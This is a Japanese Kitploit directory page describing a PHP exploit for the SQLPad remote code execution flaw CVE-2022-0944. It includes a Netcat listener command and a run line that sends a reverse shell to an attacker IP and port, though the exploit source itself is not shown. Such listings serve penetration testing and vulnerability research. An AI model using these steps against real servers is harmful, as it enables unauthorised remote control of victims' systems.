Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 リモートコード実行エクスプロイト | Kitploit
ツール/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 リモートコード実行エクスプロイト

リポジトリを見る
131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

動作の仕組み:

このPHPコードは、SQLPadにおけるリモートコード実行(RCE)の脆弱性(CVE-2022-0944)を悪用するために設計されています。
SQLPadアプリケーションに悪意のあるコードを注入し、脆弱なシステムのリモート制御を攻撃者に与える接続である
リバースシェル
を開くシステムコマンドを実行させます。


前提条件:

  • PHP CLI – sudo apt-get install php-cli
  • cURL(PHP cURLライブラリ) – sudo apt-get install php-curl

使用方法:

1. リスナーのセットアップ(攻撃者マシン上)

リバースシェル接続をキャプチャするには、攻撃者のマシンでNetcatを起動します:

root@kitploit:~
nc -lvnp 4444

エクスプロイトを実行する

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: 脆弱なSQLPadのルートURL(例:

http://target.com:3000)

<attacker_ip>: リバース接続を待ち受ける攻撃者のIPアドレス(NetcatのIPと同じ)

<attacker_port>: 攻撃者が待ち受けるポート(Netcatのポートと同じ)

参考情報

元のエクスプロイトのロジックは、次のリポジトリに基づいています:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

ここでの私の目標は、エクスプロイトのロジックを理解し、個人的な挑戦として別のプログラミング言語で書き直すことでした。

追加の参考情報: 🔗 CVE-2022-0944 – NVD

ツールをダウンロード